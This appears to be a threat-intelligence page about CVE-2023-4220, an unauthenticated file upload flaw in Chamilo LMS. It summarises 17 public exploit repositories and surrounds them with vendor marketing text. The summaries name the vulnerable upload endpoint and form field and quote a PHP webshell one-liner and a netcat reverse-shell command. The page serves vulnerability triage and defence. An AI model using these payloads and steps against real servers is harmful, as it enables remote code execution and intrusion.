CVE-2023-4220 is a high-severity vulnerability in Chamilo LMS versions up to and including 1.11.24, specifically in the big file upload functionality implemented in /main/inc/lib/javascript/bigupload/inc/bigUpload.php. The vulnerability arises from a lack of filename sanitization and insufficient restrictions on file types, allowing unauthenticated attackers to upload arbitrary files, including PHP web shells, to a writable directory within the web root. This enables both stored cross-site scripting (XSS) and remote code execution (RCE) if the uploaded file is accessed and executed by the server.
Mallory correlates every CVE against your assets, your vendors, and active adversary campaigns. Know which vulnerabilities matter for you, not just which ones are loud.
What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.
What an attacker gets, and what they’ve been doing with it.
If you can’t patch tonight, do this now.
Patch, then assume compromise.
17 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos (1 hidden).
Repository contains two separate offensive scripts plus one ASPX webshell payload. autopwn.py is an automated exploit for a misconfiguration/attack path where an FTP service (default anonymous login) is synchronized with a Microsoft IIS web root. It uploads a user-supplied ASPX file and nc.exe via FTP, then accesses the uploaded ASPX page over HTTP, scrapes ASP.NET __VIEWSTATE and __EVENTVALIDATION fields, and submits a command that launches netcat as a reverse shell using 'C:\inetpub\wwwroot\nc.exe -e cmd <lhost> <lport>'. If the --shell flag is used, it also starts a listener and provides an interactive session. malicious.aspx is the companion ASP.NET webshell used by autopwn.py; it executes arbitrary commands through cmd.exe and returns output in the HTTP response. cve-2023-4220.py is a standalone exploit for Chamilo LMS CVE-2023-4220. It abuses the unauthenticated bigUpload endpoint to upload a PHP webshell ('<?php system($_GET[cmd]); ?>') to /main/inc/lib/javascript/bigupload/files/ and then executes an attacker-supplied command via the cmd query parameter. Overall, the repository is a small collection of operational RCE tooling focused on web-accessible shell deployment and command execution, not a detection-only project.
Repository contains a focused Python exploit for CVE-2023-4220 in Chamilo LMS BigUpload. Structure is minimal: two standalone exploit scripts, one README, and a requests-only requirements file. Both Python scripts implement the same core exploitation chain: build target-relative URLs, optionally check whether the BigUpload files directory is reachable, upload a PHP payload through the unauthenticated BigUpload handler using multipart/form-data with field name bigUploadFile, derive the resulting webshell URL in the exposed files directory, verify command execution by echoing a random marker, and then either run a single command or trigger a reverse shell. The main target paths are /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported for upload and /main/inc/lib/javascript/bigupload/files/ for retrieval/execution of the uploaded file. The uploaded payload is a simple PHP command wrapper using system($_GET["cmd"]) with output markers __SPX_START__ and __SPX_END__ to parse command output from HTTP responses. This makes the exploit an unauthenticated arbitrary file upload leading to RCE via webshell. The auto variant (chamilo_cve_2023_4220_auto.py) is the more capable script. In addition to upload and command execution, it includes local listener functionality for reverse shells and attempts to stabilize and interact with the incoming shell session automatically. The OSCP variant (chamilo_cve_2023_4220_oscp.py) is simpler and assumes the operator starts a listener manually; it only sends the reverse shell command to the uploaded webshell. Both support custom filenames, proxying, timeout control, optional TLS verification, and cleanup attempts. Cleanup is implemented by issuing rm -f against the uploaded filename through the webshell, which may fail depending on the server working directory. Overall, this is a real, operational exploit repository rather than a detector. It is not tied to a larger exploitation framework. Its purpose is to provide practical unauthenticated RCE against vulnerable Chamilo LMS <= 1.11.24 instances by abusing BigUpload file upload behavior and web-accessible storage of uploaded PHP files.
Repository contains a focused Python exploit for CVE-2023-4220 in Chamilo LMS BigUpload, with 4 files total: two Python exploit scripts, a README, and a requirements file. The code is not part of a larger exploit framework. Both scripts implement the same core exploitation chain: build the BigUpload upload endpoint under the supplied base URL, upload a PHP webshell via multipart/form-data using the bigUploadFile field to bigUpload.php?action=post-unsupported, derive the resulting webshell URL under /main/inc/lib/javascript/bigupload/files/, verify command execution by echoing a random marker, and then either run a single command or trigger a reverse shell. The uploaded payload is a minimal PHP command wrapper using system($_GET["cmd"]) with output delimiters __SPX_START__ and __SPX_END__ so the script can reliably parse command output from HTTP responses. This gives unauthenticated remote command execution if the upload succeeds and PHP execution is allowed in the upload directory. The repository provides two operator workflows: chamilo_cve_2023_4220_auto.py is the more feature-rich version that includes local listener management and interactive reverse shell handling; chamilo_cve_2023_4220_oscp.py is a simpler/manual variant intended for use with an externally started listener. The auto version imports socket, select, tty, termios, threading, and related modules to manage an inbound shell session, while the OSCP version only sends the reverse shell trigger. Both support --check, --upload, --cmd, --shell, --filename, --proxy, --timeout, --verify-tls, and --cleanup. The auto version additionally supports --listen-timeout. Fingerprintable target paths are consistent across the repo: /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported for upload and /main/inc/lib/javascript/bigupload/files/ for payload retrieval. The exploit is operational rather than a mere PoC because it includes a working payload, command execution logic, reverse shell support, verification routines, and optional cleanup.
Repository contains a Python PoC exploit for Chamilo LMS BigUpload arbitrary file upload leading to RCE (labeled CVE-2023-4220 in README). Structure: - CVE-2023-4220.py: Main exploit script. It (1) checks reachability of the base URL, (2) verifies the presence of the publicly accessible upload directory at /main/inc/lib/javascript/bigupload/files/ (expects HTTP 200), (3) uploads an attacker-supplied file (typically webshell.php) to /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported using multipart form field bigUploadFile, (4) prints the resulting webshell URL, and (5) optionally triggers a reverse shell by calling the uploaded webshell with ?cmd=<urlencoded bash reverse shell>. It then starts a pwntools listener on the chosen port and provides an interactive session, including a basic TTY upgrade via python3 pty. - webshell.php: Simple command-execution webshell that runs system($_GET['cmd']). - requirements.txt: pwn, termcolor, requests. - README.md: Describes the vulnerability and endpoints; notes use on HTB PermX and affected versions (≤ 1.11.24). Primary capability: unauthenticated remote code execution by uploading and invoking a PHP webshell in a web-accessible directory, then establishing a reverse shell back to the attacker.
Repository contains a single Python proof-of-concept exploit for CVE-2023-4220 affecting Chamilo LMS <= 1.11.24. Structure: (1) README.md describing the vulnerability (unauthenticated file upload leading to RCE) and usage (python3 exploit.py -u URL -c COMMAND), (2) exploit.py implementing the exploit, and (3) GPLv3 LICENSE. Exploit flow (exploit.py): - Defines hardcoded target paths: vulnerable_endpoint '/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported' and upload_directory '/main/inc/lib/javascript/bigupload/files/'. - main(): performs a GET to the upload_directory to ensure it is reachable (HTTP 2xx required). - execute_command(): crafts a minimal PHP payload '<?php system("<command>"); ?>', uploads it via multipart/form-data POST parameter 'bigUploadFile' with filename 'lsb_rce.php', checks for 2xx, then GETs the uploaded file to trigger command execution and prints the response body. Capabilities: unauthenticated remote code execution via arbitrary command execution on the Chamilo server by uploading and invoking a PHP webshell. No persistence beyond the uploaded file, no cleanup, no authentication bypass logic beyond relying on the unauthenticated upload behavior.
This repository contains a proof-of-concept exploit for CVE-2023-4220, targeting Chamilo versions 1.11.24 and below. The exploit leverages an unauthenticated file upload vulnerability, allowing an attacker to upload a PHP webshell to the server. The main exploit logic is implemented in 'exploit.py', which takes a target URL and a command to execute. The script uploads a PHP file containing a system command execution payload to a known vulnerable endpoint, then accesses the uploaded file to execute the provided command and prints the output. The repository structure is simple, consisting of a license file, a README with usage instructions, and the exploit script. The attack vector is network-based, requiring only HTTP access to the vulnerable Chamilo instance. The exploit is operational, as it provides a working payload and demonstrates remote code execution via a webshell.
This repository provides a Python-based exploit for CVE-2023-4220, targeting Chamilo LMS versions prior to 1.11.24. The exploit leverages an unauthenticated file upload vulnerability in the 'bigUpload' component, allowing attackers to upload arbitrary files to the server. The main functionality is implemented in 'exploit.py' (core exploit logic) and 'main.py' (CLI interface and user interaction). The exploit supports three actions: (1) scanning for vulnerability by checking access to the upload directory, (2) uploading a PHP webshell for command execution, and (3) uploading and executing a bash reverse shell for remote shell access. The endpoints targeted are '/main/inc/lib/javascript/bigupload/files/' (for file access) and '/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported' (for file upload). The exploit is operational and provides real-world attack capabilities, requiring only the target URL and, for reverse shell, attacker-controlled host and port. The code is cleanly structured, with clear separation between exploit logic and user interface, and is accompanied by a detailed README with usage instructions and references.
This repository contains a single Metasploit module (modules/exploits/linux/http/chamilo_bigupload_webshell.rb) targeting Chamilo LMS versions <= 1.11.24. The exploit leverages an unrestricted file upload vulnerability in the bigUpload.php endpoint, which, when accessed with the GET parameter action=post-unsupported, bypasses file extension checks. If the /main/inc/lib/javascript/bigupload/files/ directory exists on the target, the module uploads a PHP webshell to this location and then triggers its execution, resulting in remote code execution. The module is fully weaponized, supporting arbitrary PHP payloads via the Metasploit framework. The main endpoints involved are the vulnerable upload handler and the directory where the webshell is placed. The exploit is operational only if the target directory exists, which is not the default configuration. The code is written in Ruby and is structured as a standard Metasploit exploit module.
This repository provides an operational exploit for CVE-2023-4220, a remote code execution vulnerability in Chamilo LMS. The exploit consists of a Python script (chamilo-rce.py) and a Bash script (exploit.sh). Both scripts generate a PHP reverse shell payload (rce.php) with attacker-supplied IP and port, upload it to a vulnerable Chamilo LMS instance via a specific file upload endpoint, and then trigger the shell by accessing the uploaded file. The Python script allows for more flexible targeting by accepting command-line arguments, while the Bash script is more static and uses curl for the upload and execution steps. The exploit targets the web application's file upload functionality to achieve unauthenticated code execution, providing the attacker with a reverse shell on the target server. The main endpoints involved are the file upload handler and the location where the uploaded PHP shell can be accessed and executed.
This repository contains an exploit for CVE-2023-4220, targeting the Chamilo e-learning platform. The exploit is implemented in Python (exploit.py) and is designed to upload an arbitrary file (such as a webshell) to a vulnerable Chamilo instance via the bigUpload.php endpoint. The README provides usage instructions, specifying the need to supply the target URL and the file to upload. The exploit works by sending a POST request with the file as 'bigUploadFile' to the specified endpoint. If successful, the file is uploaded to the server, potentially allowing remote code execution. The repository is straightforward, with a single exploit script and a README, and does not use any exploit frameworks. The main attack vector is network-based, exploiting an exposed HTTP endpoint.
This repository contains a Bash script (CVE-2023-4220) and a README.md. The script exploits a Remote Code Execution (RCE) vulnerability (CVE-2023-4220) in Chamilo LMS versions 1.11.24 and below. The exploit works by downloading a PHP reverse shell from revshells.com, uploading it to the vulnerable bigUpload.php endpoint on the target Chamilo LMS instance, and then triggering the shell to establish a reverse connection to the attacker's machine. The attacker must provide their own IP, port, and the target's URL. The script automates the entire process, including starting a Netcat listener for the reverse shell. The README.md provides detailed usage instructions, technical breakdown, and legal disclaimers. The main exploit file is a Bash script, and the only code file in the repository. The exploit targets a specific file upload vulnerability in Chamilo LMS, and the endpoints involved are clearly fingerprintable in the script.
This repository contains a Python exploit script (CVE-2023-4220.py) targeting Chamilo LMS versions 1.11.24 and earlier, exploiting an unrestricted file upload vulnerability (CVE-2023-4220). The exploit works by uploading a PHP web shell to the vulnerable bigUpload.php endpoint, then accessing the uploaded shell to execute arbitrary commands. The script is capable of triggering a reverse shell, granting the attacker remote code execution on the target server. The repository includes a README with usage instructions and a LICENSE file. The main exploit logic is contained in a single Python file, which requires the attacker to specify the target host, their own IP, and a listening port. The exploit is operational and provides a working payload for remote code execution.
This repository contains a Python exploit (exploit.py) targeting CVE-2023-4220, an unrestricted file upload vulnerability in Chamilo LMS <= v1.11.24. The exploit crafts a PHP web shell (rce.php) that executes arbitrary system commands, optionally establishing a reverse shell to the attacker's machine. The exploit uploads the web shell to the vulnerable bigUpload.php endpoint and then triggers its execution via a direct HTTP request. The repository includes a README with usage instructions and a .gitignore for the generated rce.php file. The main exploit logic is in exploit.py, which handles argument parsing, payload generation, file upload, and execution. The attack vector is network-based, requiring access to the target's web interface. The endpoints involved are the file upload handler and the location where the web shell is accessed.
This repository provides a Python-based exploit for CVE-2023-4220, a remote code execution vulnerability in Chamilo LMS versions prior to 1.11.24. The exploit consists of two main files: 'exploit.py', which implements the exploitation logic, and 'main.py', which provides a command-line interface for users. The exploit supports three actions: 'scan' (to check if the target is vulnerable by probing the bigupload files directory), 'webshell' (to upload a PHP webshell to the target), and 'revshell' (to upload a PHP webshell and then use it to create and execute a bash reverse shell connecting back to the attacker's host and port). The main endpoints targeted are '/main/inc/lib/javascript/bigupload/files/' for checking and webshell access, and '/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported' for uploading files. The exploit is operational and provides real code execution on the target, requiring only network access to the Chamilo LMS instance. The repository is well-structured, with clear separation between exploitation logic and user interface, and includes a requirements.txt for dependencies.
This repository documents a proof-of-concept exploit for an unauthenticated file upload vulnerability (CVE-2023-4220) in Chamilo LMS versions up to 1.11.24. The exploit allows an attacker to upload arbitrary files, such as a PHP web shell, via the vulnerable endpoint /main/inc/lib/javascript/bigupload/inc/bigUpload.php. Uploaded files are placed in the /main/inc/lib/javascript/bigupload/files directory, which is web-accessible, enabling remote code execution. The repository consists mainly of configuration files and a README.md that provides detailed exploitation steps, including a sample payload and curl command for exploitation. No actual exploit code is present; the repository serves as documentation and a manual proof-of-concept for the vulnerability.
This repository contains a Bash exploit script (CVE-2023-4220.sh) and a README.md for exploiting an unrestricted file upload vulnerability (CVE-2023-4220) in Chamilo LMS versions 1.11.24 and earlier. The exploit targets the big file upload functionality at /main/inc/lib/javascript/bigupload/inc/bigUpload.php, allowing an attacker to upload arbitrary files (such as a reverse shell) to the server's /main/inc/lib/javascript/bigupload/files/ directory. The script uses curl to upload the attacker's reverse shell file and then attempts to trigger it, providing instructions for obtaining an interactive shell. The README provides usage instructions and example output. The exploit is operational, requiring the attacker to supply their own reverse shell payload and set up a listener. No hardcoded payload is included, but the script automates the upload and shell access process.
This repository is a Python-based exploit for CVE-2023-4220, targeting Chamilo LMS versions prior to 1.11.24. The exploit leverages an unauthenticated file upload vulnerability in the 'bigUpload' component, specifically at the endpoint '/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'. The repository contains four files: a README.md with usage instructions, 'exploit.py' implementing the core exploit logic, 'main.py' providing a CLI interface, and 'requirements.txt' listing dependencies. The exploit supports three actions: 'scan' (checks if the target is vulnerable), 'webshell' (uploads a PHP webshell for arbitrary command execution), and 'revshell' (uploads and executes a bash reverse shell, connecting back to an attacker-controlled host and port). The main entry point is 'main.py', which parses arguments and invokes the appropriate exploit action. The exploit is operational and provides real remote code execution capabilities, requiring only network access to the target Chamilo LMS instance.
Products and vendors Mallory has correlated with this vulnerability. Open in Mallory to drill down to specific CPE configurations and version ranges.
Vendor-confirmed product mapping. Mallory continuously reconciles this list against your asset inventory.
No public activity tracked yet. Mallory keeps watching.
No public activity observed for this vulnerability.
Query your assets running an affected version, and investigate the blast radius.
Every observed campaign linking this CVE to a named adversary.
Malware families riding this exploit, with evidence and IOCs.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Cross-references every affected SKU, including bundled OEM variants.
Community discussion across Reddit, Mastodon, and other social sources.